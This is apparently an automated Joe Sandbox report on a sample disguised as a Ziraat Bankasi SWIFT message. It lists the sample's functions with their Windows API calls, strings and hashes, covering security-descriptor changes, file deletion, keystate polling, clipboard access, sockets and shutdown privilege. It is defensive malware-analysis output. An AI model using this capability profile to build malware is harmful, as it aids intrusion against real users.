Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: cd796d69a16da21564f7d28eb69c14c596c31f008d6719a899f0375186a83aa8
Instruction ID: f094b207e12234554cd75184330d285b8eef35b0e5741acb90bd93405f7f4af3
Opcode Fuzzy Hash: cd796d69a16da21564f7d28eb69c14c596c31f008d6719a899f0375186a83aa8
Instruction Fuzzy Hash: 11615C725083059FDB10DF60C845AAEB3E8FF89310F04491EFA99D7652EB35E945CB92

Function 000DA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000DABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000DABD7
Part of subcall function 000DABBB: GetLastError.KERNEL32(?,000DA69F,?,?,?), ref: 000DABE1
Part of subcall function 000DABBB: GetProcessHeap.KERNEL32(00000008,?,?,000DA69F,?,?,?), ref: 000DABF0
Part of subcall function 000DABBB: HeapAlloc.KERNEL32(00000000,?,000DA69F,?,?,?), ref: 000DABF7
Part of subcall function 000DABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000DAC0E

Part of subcall function 000DAC56: GetProcessHeap.KERNEL32(00000008,000DA6B5,00000000,00000000,?,000DA6B5,?), ref: 000DAC62
Part of subcall function 000DAC56: HeapAlloc.KERNEL32(00000000,?,000DA6B5,?), ref: 000DAC69
Part of subcall function 000DAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000DA6B5,?), ref: 000DAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000DA6D0
_memset.LIBCMT ref: 000DA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000DA704
GetLengthSid.ADVAPI32(?), ref: 000DA715
GetAce.ADVAPI32(?,00000000,?), ref: 000DA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000DA76E
GetLengthSid.ADVAPI32(?), ref: 000DA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000DA79A
HeapAlloc.KERNEL32(00000000), ref: 000DA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000DA7C2
CopySid.ADVAPI32(00000000), ref: 000DA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000DA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000DA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000DA834

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: a3c0213c2c972d84a2fa4b3a1d7da5bb0cdaa67f9d3665da68ea147cef4be09d
Instruction ID: cc01cf10e959d664dd93236ec11aa8c11706e9b433a831ef5f3741735f484194
Opcode Fuzzy Hash: a3c0213c2c972d84a2fa4b3a1d7da5bb0cdaa67f9d3665da68ea147cef4be09d
Instruction Fuzzy Hash: 8D514D71A0020AAFDF109FA4DC45EEEBBB9FF09300F04812AF911A6251DB749956DB65

Function 000A6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 00122CD1
LIMIT_RECURSION=, xrefs: 00122D7E
LF), xrefs: 00122E26
ANY), xrefs: 00122E60
UTF), xrefs: 00122C7C
LIMIT_MATCH=, xrefs: 00122CF2
CRLF), xrefs: 00122E43
BSR_ANYCRLF), xrefs: 00122EA0
UCP), xrefs: 00122C8F
NO_AUTO_POSSESS), xrefs: 00122CB0
CR), xrefs: 00122E09
ANYCRLF), xrefs: 00122E7D
BSR_UNICODE), xrefs: 00122EBA
UTF16), xrefs: 00122C56

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 8ad735f69c6fa1bbd3e88ad14fbe4911e498cbfde497877cb5ce5d12b1d47588
Instruction ID: 823718bb22452a7037910bfab517eda7333bf4918d655ba6d1a96e7ee328d8e1
Opcode Fuzzy Hash: 8ad735f69c6fa1bbd3e88ad14fbe4911e498cbfde497877cb5ce5d12b1d47588
Instruction Fuzzy Hash: A6729271E04229DBDF24CF98D8407AEB7B5FF09310F15816AE819EB281DB749E91DB90

Function 000E63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000E6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000E5FA6,?), ref: 000E6ED8

Part of subcall function 000E72CB: GetFileAttributesW.KERNEL32(?,000E6019), ref: 000E72CC

_wcscat.LIBCMT ref: 000E6441
__wsplitpath.LIBCMT ref: 000E645F
FindFirstFileW.KERNEL32(?,?), ref: 000E6474
_wcscpy.LIBCMT ref: 000E64A3
_wcscat.LIBCMT ref: 000E64B8
_wcscat.LIBCMT ref: 000E64CA
DeleteFileW.KERNEL32(?), ref: 000E64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 000E64EB
FindClose.KERNEL32(00000000), ref: 000E6506

Strings

\*.*, xrefs: 000E643B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 79d2a547434f3845f1520ef328bde02d74d1d8b3c3907de8a9ea5f9c24eee456
Instruction ID: c536ea4e8c74accd26bec73586d2fdda1eb745e8625b1223bd34ac2330b8154f
Opcode Fuzzy Hash: 79d2a547434f3845f1520ef328bde02d74d1d8b3c3907de8a9ea5f9c24eee456
Instruction Fuzzy Hash: 953191B2408384AEC321DBA4D885EDFB7DCAB65350F00091EF5D9C3142EA36D5498767

Function 001031BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00102BB5,?,?), ref: 00103C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0010328E

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0010332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001033C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00103604
RegCloseKey.ADVAPI32(00000000), ref: 00103611

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: c006e1142637901e6bf4b549f9cded1204fa5079eaca7d3f1586ee545c0ccae5
Instruction ID: 809c1e9a8b68b7fe197d25aeae6ff340327d31551135423c97b1b68b54c4dd21
Opcode Fuzzy Hash: c006e1142637901e6bf4b549f9cded1204fa5079eaca7d3f1586ee545c0ccae5
Instruction Fuzzy Hash: C8E15C31604200AFCB14DF68C895D6ABBE8FF89310F04856DF59ADB2A2DB71EA05CB51

Function 000E2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000E2B5F
GetAsyncKeyState.USER32(000000A0), ref: 000E2BE0
GetKeyState.USER32(000000A0), ref: 000E2BFB
GetAsyncKeyState.USER32(000000A1), ref: 000E2C15
GetKeyState.USER32(000000A1), ref: 000E2C2A
GetAsyncKeyState.USER32(00000011), ref: 000E2C42
GetKeyState.USER32(00000011), ref: 000E2C54
GetAsyncKeyState.USER32(00000012), ref: 000E2C6C
GetKeyState.USER32(00000012), ref: 000E2C7E
GetAsyncKeyState.USER32(0000005B), ref: 000E2C96
GetKeyState.USER32(0000005B), ref: 000E2CA8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ee40412c4cb133fd8f272cc572387b45463b416021826338bf01489eb2df1cac
Instruction ID: bf7ba9bd6f706c56a6c82318681e5daa12c3f4f3816d9ce23e39d966549b0a22
Opcode Fuzzy Hash: ee40412c4cb133fd8f272cc572387b45463b416021826338bf01489eb2df1cac
Instruction Fuzzy Hash: FD41F5305047C96DFFB49B62C8043A9BFF86F11304F14845AD9C6666C2EBE49DC8C7A2

Function 000F6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 000F6D2E
EmptyClipboard.USER32 ref: 000F6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 000F6D49
CloseClipboard.USER32 ref: 000F6DE8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: fc3c3719d1bab56beafafa9cb8e701e205aa4e2c6b28b8c162e942068f274106
Instruction ID: 4e69b9da5d89a51d79a3851cd6512b84a216a22bf8331833f23e7e3780067269
Opcode Fuzzy Hash: fc3c3719d1bab56beafafa9cb8e701e205aa4e2c6b28b8c162e942068f274106
Instruction Fuzzy Hash: 5421AE31700114EFDB21AF65EC49B6E77A8FF14710F048019FA0ADB6A2DB72ED529B91

Function 000FC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 000D9ABF: CLSIDFromProgID.OLE32 ref: 000D9ADC
Part of subcall function 000D9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 000D9AF7
Part of subcall function 000D9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 000D9B05
Part of subcall function 000D9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000D9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000FC235
_memset.LIBCMT ref: 000FC242
_memset.LIBCMT ref: 000FC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000FC38C
CoTaskMemFree.OLE32(?), ref: 000FC397

Strings

NULL Pointer assignment, xrefs: 000FC3E5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: f7ed48ebb1d26007e431e114eece518312348b32b438b2f7e79bb8ede168b47c
Instruction ID: abe2326321f63865a4283e81af572f03c33689866a458f8bf9d9d992d9e1de5a
Opcode Fuzzy Hash: f7ed48ebb1d26007e431e114eece518312348b32b438b2f7e79bb8ede168b47c
Instruction Fuzzy Hash: 48912A71D0021CEBDB10DF94DC81EEEBBB8AF09750F10811AF615A7282DB71AA45DFA0

Function 000E79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 000DB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000DB180
Part of subcall function 000DB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000DB1AD
Part of subcall function 000DB134: GetLastError.KERNEL32 ref: 000DB1BA

ExitWindowsEx.USER32(?,00000000), ref: 000E7A0F

Strings

SeShutdownPrivilege, xrefs: 000E79DD
, xrefs: 000E79FD
@, xrefs: 000E7A02

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: d94ca2c6071a7ac61107f6a8fa6070f32e1b005a7d89ed9762daff12295e3ce0
Instruction ID: c35e2b81fa607f05eb737c25fdc0942932e07bc6a6baeafa37229a3b0ddaedb3
Opcode Fuzzy Hash: d94ca2c6071a7ac61107f6a8fa6070f32e1b005a7d89ed9762daff12295e3ce0
Instruction Fuzzy Hash: FD01D4716592A1BEE7786675DC4ABBE72989B40740F180835B917F21D3E6A09E0181B2

Function 000F8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000F8CA8
WSAGetLastError.WSOCK32(00000000), ref: 000F8CB7
bind.WSOCK32(00000000,?,00000010), ref: 000F8CD3
listen.WSOCK32(00000000,00000005), ref: 000F8CE2
WSAGetLastError.WSOCK32(00000000), ref: 000F8CFC
closesocket.WSOCK32(00000000,00000000), ref: 000F8D10

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: f573a21bd85156e58a5bca28032ee9e97eb2a60666ade4f45999335f324c062c
Instruction ID: cbfcfd68584656aaa642798847ed75481ff88b49692b48f0a5d2e39d6fb50f80
Opcode Fuzzy Hash: f573a21bd85156e58a5bca28032ee9e97eb2a60666ade4f45999335f324c062c
Instruction Fuzzy Hash: 6221E131600204AFCB20EF68D845BBEB7E9FF49314F108158FA16A76D2CB30AD42DB61

Function 000E6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000E6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 000E6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 000E6583
__wsplitpath.LIBCMT ref: 000E65A7
_wcscat.LIBCMT ref: 000E65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 000E65F9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 74f23fa948b627c385ab03afeb754f3ac072931aa8e483a753f4b150d9c034c8
Instruction ID: 5df3255fc495aeb23d52baa24e0372fb984d0cb79ddbec0ca8367e53929138ed
Opcode Fuzzy Hash: 74f23fa948b627c385ab03afeb754f3ac072931aa8e483a753f4b150d9c034c8
Instruction Fuzzy Hash: 4321A772A00258AFDB20ABA5DC88FDEB7FCAB19340F5000A9F505E3141D7719F85CB60

Function 000F923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000FA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000FA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 000F9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 000F92B9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: c497d04e356c0b04b0ba38d128d9ce0616357089d903ddfbdb0bf3591e0f0c39
Instruction ID: 576632cbebde81ca23e742eae601301e620c5f09e91e9062921352453f7d101d
Opcode Fuzzy Hash: c497d04e356c0b04b0ba38d128d9ce0616357089d903ddfbdb0bf3591e0f0c39
Instruction Fuzzy Hash: 6641C171600204AFDB14AF68CC92EFE77EDEF44764F144458FA56AB283CB749E428B91

Function 000EEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000EEB8A
_wcscmp.LIBCMT ref: 000EEBBA
_wcscmp.LIBCMT ref: 000EEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 000EEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 000EEC0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: de5244a1a8ff021354e0adf4e328969f6a86de73e1c24adb598fcbf6e1780b69
Instruction ID: 299b31ed649a5afe68ffdb99470465abff551b65d17db8a081b11c0a6ce45fff
Opcode Fuzzy Hash: de5244a1a8ff021354e0adf4e328969f6a86de73e1c24adb598fcbf6e1780b69
Instruction Fuzzy Hash: 8841ED31600342DFCB18DF28C490EEAB7E4FF49324F20455DE96A9B3A2DB31A941CB91

Function 00108111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00108160
IsWindowEnabled.USER32 ref: 0010816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0010817B
IsIconic.USER32 ref: 00108189
IsZoomed.USER32 ref: 00108197

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 116db197add99c097b13b1dbcebc2f05aa133cb6b8796a09b2fb8babca3908a0
Instruction ID: 079dd87198a949dd83d3f926e45b302270077b0542464ff405bacd8f91402564
Opcode Fuzzy Hash: 116db197add99c097b13b1dbcebc2f05aa133cb6b8796a09b2fb8babca3908a0
Instruction Fuzzy Hash: 2411C131304210AFE7212F26EC44EAFBB9DEF54760B054429F8C9D7282CFB0E94386A4

Function 000A9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

ERCP, xrefs: 000A9C32
VUUU, xrefs: 000A9EA7
VUUU, xrefs: 000A9E95
VUUU, xrefs: 000A9ED4
VUUU, xrefs: 0012BE14

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 8334793b95206b814cd1ddc1c404cc9aa51b200f27d7951462158f984eb85178
Instruction ID: 81b3d8a26f33d968f99552f494928724ccdd997542c10ada5bd0bd02453b2487
Opcode Fuzzy Hash: 8334793b95206b814cd1ddc1c404cc9aa51b200f27d7951462158f984eb85178
Instruction Fuzzy Hash: 5F929071E0022ACBDF34CF98D8807EDB7B1BB56314F1581AAE916AB280D7719D91CF91

Function 000BE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000BE014,76F90AE0,000BDEF1,0013DC38,?,?), ref: 000BE02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000BE03E

Strings

GetNativeSystemInfo, xrefs: 000BE038
kernel32.dll, xrefs: 000BE027

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

